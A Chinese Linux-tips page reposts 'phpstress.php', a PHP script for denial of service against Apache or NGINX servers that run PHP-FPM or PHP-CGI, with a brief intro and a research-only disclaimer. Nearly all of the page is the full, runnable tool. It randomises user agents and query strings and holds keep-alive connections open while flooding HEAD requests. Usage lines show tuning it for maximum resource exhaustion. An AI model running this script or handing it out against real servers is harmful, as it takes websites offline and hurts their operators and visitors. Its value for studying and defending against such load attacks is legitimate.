当前位置: > Linux服务器 > nginx >

Apache/nginx使用PHP-FPM或PHP-CGI拒绝服务漏洞攻击

时间:2014-11-22 00:13来源:linux.it.net.cn 作者:IT


使用标准cable/DSL连接,这种攻击可以使用标准的HTTP请求占满一台Linux web服务器的CPU和内存。这种攻击影响使用PHP-CGI或PHP-FPM(包含WordPress站点在内)解析PHP动态内容的Apache或者NGINX web服务器。另外,这种攻击制造的请求将会在攻击后的较长时间内继续占用服务器资源。

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

 

<?php
    #!/usr/bin/php
    /*
     
    File: phpstress.php
    Written by: d4rk0 / @d4rk0s
    Concept by: Vinny Troia / @VinnyTroia
    Night Lion Security (http://www.nightlionsecurity.com)
    ---------------------------------------------------------------------
    Description:
    This is a light-weight low-bandwidth required PHP script that creates
    a type of denial of service on a Linux-based Apache or NGINX web server
    that process PHP content with PHP-CGI (fcgid) or PHP-FPM (Apache or NGINX).
    The script will create a number of fake PHP connections, causing the server
    to quickly launch additional processes to meet the new demand. In addition,
    the server's connections are kept open (via keep-alive), causing the server
    to quickly run out of resources.
     
    In order to completely max out the server's
    resources, the script's delay parms need to both be set to 0.
     
    For more information, please view the complete post at
    http://www.nightlionsecurity.com/blog/
    ----------------------------------------------------------------------
    Disclaimer:
    Don't be a dick.
    ----------------------------------------------------------------------
    Usage:
    php phpstress.php http://www.target.com/?r=%r% -m 1000000000 -k Y -c 150 -d 0.5 -r 0.01
     
    OR
     
    php phpstress.php www.target.com/wp-content/?r=%r%
     
    Socks Proxy: * NOT IN ALPHA VERSION
    -s = Y or N / 127.0.0.1:9050 Username:Pw
    Default is N leaving out Username:Pw means there is no Username and Password
    Edit the phpstress.socks file if you want to use a socks proxy
    ----------------------------------------
    Commands:
    Target URL picking a resource intense page and inserting %r where the GET variables data is will generate random chars
    -m = Maximum requests not specifying this will leave it at a large default number to exit script on
    *nix flavored simply press control c to kill the program and exit or whatever TTY command you have setup
    to exit a program on command line
    Default value is 1000000000
     
    -k = Y or N Keep Alive Check will check if Server uses the Keep-Alive Option to keep the connection alive
    Default value is Y
     
    -c = Maximum Request Per Connection each connection opened will then request D number of times
    Default value of 150
    -d = Delay Between Connections The number of seconds to delay between opening a new connection.
    Default value: 0.5
    -r = Delay Between Requests The number of seconds to delay between outgoing requests.
    Default value: 0.04
     
    */
    // BEGIN SCRIPT
    error_reporting(0);
    // make sure script has no time limit for execution
    set_time_limit(0);
     
     
    /*
    Randomly pick a UserAgent for deployment on page request
    PARAM: None
    RETURN: returns a random user agent string
    */
    function userAgentRand(){
     
    // lets create our array with random user agents
    $userArray = array("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; RW; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
    "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:1.8.0.7) Gecko/20110321 MultiZilla/4.33.2.6a SeaMonkey/8.6.55",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
    "Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)".
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
    "Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10".
    "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre",
    "Mozilla/5.0 (Windows NT 5.2; RW; rv:7.0a1) Gecko/20091211 SeaMonkey/9.23a1pre");
     
     
    // Lets shuffle our array
    shuffle($userArray);
    // count how many user agents in array
    $count = count($userArray);
    // minus one to adjust starting at 0
    $count = mt_rand(0,$count-1);
    // return "Random" User Agent
    return $userArray[$count];
     
    }
     
     
     
     
    /*
    Function used for adding random string to request urls
    PARAM: none
    RETURN: returns random string of chars
    */
    function quick_rand(){
    $rand_string = "";
    $letters = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z");
    for($i=0;$i<mt_rand(5,16);$i++){
    $rand_string.=$letters[array_rand($letters)];
    }
    return($rand_string);
    }
     
     
     
    /*
    Parse the target URL to return the host, path and query
    PARAM: the URL string to be parsed
    RETURN: returns an array of host path & query
    */
    function parseUrl($target_url){
     
     
     
    $t = "";
    $t = strpos($target_url,'http://');
    if ($t === false) {
    $target_url = "http://". $target_url;
    }
     
    $target_url_parsed = parse_url($target_url);
     
    $target_url = array();
    $target_url['scheme'] = $target_url_parsed['scheme'];
    $target_url['host'] = $target_url_parsed['host'];
    $target_url['path'] = $target_url_parsed['path'];
    $target_url['query'] = $target_url_parsed['query'];
    $target_url['port'] = $target_url_parsed['port'];
     
    if(!$target_url['path']){
    $target_url['path'] = '/';
    }
     
    if(!$target_url['port']){
    $target_url['port'] = 80;
    }
    if ($target_url['scheme']){
    // return Parsed Array for Deployment and usage
    return $target_url;
    }else{
    // return proper url array
    $target_url['host'] = "http://". $target_url['host'];
    return $target_url;
    }
     
     
    }
     
     
     
    /*
    Check Query if none just append path if both append path + query
    PARAM: the parsed array of target url
    RETURN: return appended array
    */
    function checkQuery($target_url){
     
    if($target_url['query']){
    $request_url = $target_url['path']."?".$target_url['query'];
    } else {
    $request_url = $target_url['path'];
    }
    // return request url
    return $request_url;
    }
     
     
    /*
    check if user is launching this from command line or browser
    PARAM: none
    RETURN: return 1=browser or 0=command line
    */
    function checkCommandLine(){
    if(defined('STDIN')){
    $num = 0;
    }else{
    $num = 1;
    }
    return $num;
    }
     
     
     
    /*
    Check if the remote host supports Keep-Alive
    PARAM: parsed target URL
    RETURN: either keep-alive or server doesn't support keep alive string
    */
    function keepAlive($target_url){
     
    // Grab random user agent
    $useragent = userAgentRand();
     
    // Send request with Keep-Alive header
    $socket = fsockopen($target_url['host'], $target_url['port'], $errno, $errstr, 3);
    // if connection cant open
    if(!$socket){
    die("Uh-oh: Failed to open a connection to ".$target_url['host']." on port ".$target_url['port']."\n\n");
    }
     
     
     
    // lets build payload for keep-alive check
    $request = "HEAD / HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".
    $useragent."\r\nConnection: Keep-Alive\r\n\r\n";
    fwrite($socket, $request);
    $reply = "";
    // loop until end of buffer and socket stream
    while (!feof($socket)){
     
    $buffer=fgets($socket, 128);
    $reply.=$buffer;
     
    //Watch for end of reply and close socket/break out of loop
    if($buffer == "\r\n"){
    fclose($socket); break;
    }
    }
     
     
    //Check if the reply to our above request includes 'Connection: close
    if(strpos($reply, "Connection: close")){
    return "NO:KEEP-ALIVE";
    }else{ return "KEEP-ALIVE"; }
     
     
    }
     
     
    /*
    This is the actual attack that will test the stress on the server
    PARAM: target_url , request url , max requests , max request per connection
    RETURN: returns TRUE
    */
    function sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc){
     
    // max requests divided by max requests per connection
    $max_connections = ceil($mr / $mpc);
     
    echo "[!] To exit press control C or whatever TTY options are set to exit command line program\n\n\n";
    // lets loop through connections
    for($c=0;$c<$max_connections;$c++){
     
    echo "Opening connection [".($c+1)."] to ".$target_url['host']."..";
    @$attack_socket = fsockopen($target_url['host'], $target_url['port'], $errno, $error, 3);
     
    // cant open socket display fail
    if(!$attack_socket){
    echo "failed (".$error.")"."\n";
    } else {
     
    // Success lets send out connections
    echo "success"."\n"."Sending requests: |";
     
    //Stay within our max_requests_per_connection limit
    for($r=0;$r<$mpc;$r++){
    // grab a ran user agent
    $useragent = userAgentRand();
     
    // build payload for attack
    $request = "HEAD ".str_replace("%r%", quick_rand(), $request_url)." HTTP/1.1\r\nHOST: ".$target_url['host']."\r\nUser-Agent: ".$useragent."\r\nConnection: Keep-Alive\r\n\r\n";
     
    // write socket and make connection
    @fwrite($attack_socket, $request);
     
    echo ".";
     
    // Delay between requests 1 second requests
    usleep($dbr * 1000000);
     
    }
     
    echo "|"."\n";
     
    }
     
    @fclose($attack_socket);
    echo "Closed connection"."\n";
    // amount of time to delay between connections
    usleep($dbc * 1000000);
     
    }
     
    return True;
     
    }
     
     
     
    /*
    This function takes all the commands and outputs them strips them and gets them ready for proper use
    PARAM: the argv array of commands to be processed
    RETURN: returns processed array or FALSE for error
    */
    function inputCommand($commands){
     
    // Take Commands Being Passed return values as array
    $outputCommand = array();
    // count number of commands for loop
    $count = count($commands);
     
    // loop through commands
    for ($d = 0; $d < $count; $d++){
    // lets build commands
    switch ($commands[$d]){
     
    // Display help list of commands and exit
    case "--help":	
    return "HELP";
    // Display help list of commands and exit
    case "-":
    return "HELP";
    // socks proxy
    case "-s":	
    $outputCommand[] = "-s";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
     
    // target
    case "-t":	
    $outputCommand[] = "-t";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    // Grab Target ////////////////
    break;
    // maximum requests
    case "-m":	
    $outputCommand[] = "-m";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    // Grab Target ////////////////
    break;
     
    // keep alive yes or no
    case "-k":	
    $outputCommand[] = "-k";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // maximum request per connection
    case "-c":	
    $outputCommand[] = "-c";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // delay between connections
    case "-d":	
    $outputCommand[] = "-d";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    // delay between requests
    case "-r":	
    $outputCommand[] = "-r";
    // Grab Type /////////////////
    $new_number = $d++;
    $value = $commands[$d];
    $outputCommand[$new_number] = $value; // Append data to Array
    break;
     
    }
     
    }
     
    // return array with results
    return $outputCommand;
     
     
     
    }
    /*
    Check if we are on command line or not
    PARAM: NONE
    RETURN: NONE exits if true
    */
    function commandLineCheck(){
    // Check if not command line exit dont do anything
    if ($num = checkCommandLine() === 1){
    // return error to user and quit script
    echo "<h1><B>Error: phpstress only runs from command line prompt</b></h1>";
    exit(0);
    }
     
    }
     
     
    /*
    Displays the Help menu showing all available program commands
    PARAM: NONE
    RETURN: NONE exits
    */
    function displayHelp(){
    echo "
    PHPStress 1.0
    Usage: php phpstress.php [url] [options]
     
    OPTIONS:
    -t: Target URL picking a resource intense page and inserting %r
    where the GET variables data is will generate random chars
    -m: Maximum requests not specifying this will leave it at a large default number
    Default value is 1000000000
     
    -k: Keep Alive Check will check if Server uses the Keep-Alive Option
    to keep the connection alive (Y or N)
    Default value is Y
     
    -c: Maximum Request Per Connection each connection opened will
    then request D number of times
    Default value of 150
     
    -d: Delay Between Connections - The number of seconds to delay
    between opening a new connection.
    Default value: 0.5
     
    -r: Delay Between Requests The number of seconds to delay between
    outgoing requests
    Default value: 0.04 \n\n";
    exit(0);
     
    }
     
     
    /// END FUNCTIONS BEGIN ACTUAL SCRIPT
    //*********************************************************
    // check if on command line
    commandLineCheck();
     
     
    // sleep for a couple seconds before going
    //echo " [X] Processing Commands Now lets begin Attack.";
    //@usleep(1000666);
     
    // check if arguments on commmand line are present
    if (isset($argv[1])) {
    // Process commands now
    $results = inputCommand($argv);
    // display help
    if ($results === "HELP"){
    // display help
    displayHelp();
    }
     
     
    // Set counter Values
    $d = 0;
    $num = "";
    /////////////////////
    // Set Program Default Variables
    $target_url = "";
    $socks = "n";
    $k = "y";
    $mr = 10000000;
    $mpc = 150;
    $dbr = 0.02;
    $dbc = 0.7;
     
     
     
     
    // lets assign all variables now and get ready for attack
    foreach($results as $key=>$com){
     
    // Socks proxy default N
    if ($com == "-s"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $socks = $results[$r];
    }
    // Maximum requests Default is 100000000
    if ($com == "-m"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $mr = $results[$r];
    }
    // Check is server keep alive? default is Y
    if ($com == "-k"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $k = $results[$r];
    }
    // Max request per connection
    if ($com == "-c"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $mpr = $results[$r];
    }
    // delay between connections
    if ($com == "-d"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $dbc = $results[$r];
    }
    // delay between requests
    if ($com == "-r"){
    $r = $key;
    if ($r == 0){ $r++;$r++; }else{
    $r++;}
    $dbr = $results[$r];
    }
    }
     
     
    // append url now
    $target_url = $argv[1];
     
    // Lets now check and set Default values
    if (($target_url == "") || empty($target_url)){
    // Error no Target URL set
    echo " [!] ERROR: No Target URL set. \n";
    exit(0);
    }
     
     
    // Socks check now
    if ((strtolower($socks) == "n") || (strtolower($socks) == "y")){}else{
    // error socks is either a n or y question
    echo " [!] ERROR: Socks is either a [y]es or [n]o question\n\n";
    exit(0);
    }
     
    // keep alive
    if (strtolower($k) != "n" || strtolower($k) != "y"){}else{
    // error socks is either a n or y question
    echo " [!] ERROR: Keep Alive is either a [y]es or [n]o question\n";
    exit(0);
    }
     
    // Max request check now
    if ((is_numeric($mr)) || ($mr != "") || (!empty($mr))){}else{
    // error max request is not a number
    echo " [!] ERROR: Max Request must be a valid number. Default is 100000000\n";
    exit(0);
    }
     
    // Max per connection
    if ((is_numeric($mpc)) || ($mpc != "") || (!empty($mpc))){}else{
    // error max request is not a number
    echo " [!] ERROR: Max Request Per Connection is invalid. Default is 150\n";
    exit(0);
    }
     
    // Delay between request
    if ((is_numeric($dbr)) || ($dbr != "") || (!empty($dbr))){}else{
    // error
    echo " [!] ERROR: Delay between requests is invalid. Default is 0.04 seconds. \n";
    exit(0);
    }
     
    // Delay between connections
    if ((is_numeric($dbc)) || ($dbc != "") || (!empty($dbc))){}else{
    // error
    echo " [!] ERROR: Delay between connections is invalid. Default is 0.5 seconds. \n";
    exit(0);
    }
     
    }else{
    // display help
    displayHelp();
    exit(0);
    }
     
     
     
    // parse target url return a parsed array
    $target_url = parseUrl($target_url);
    // check if query empty or not empty
    $request_url = checkQuery($target_url);
     
     
    if ($k == "y"){
    // check if server supports keep-alive make sure its a parsed target url
    $keepAlive = keepAlive($target_url);
    // Switch to check results if server keeps alive
    switch ($keepAlive){
    case "NO:KEEP-ALIVE":
    $mpc = 1;
    break;
    case "KEEP-ALIVE":
    $mpc = 100;
    break;
    }
    }
     
     
     
    // send out payloads and connection
    sendphpstress($target_url,$request_url,$mr,$mpc,$dbr,$dbc);
     
     
     
    // EOF
?>


(责任编辑:IT)
------分隔线----------------------------
栏目列表
推荐内容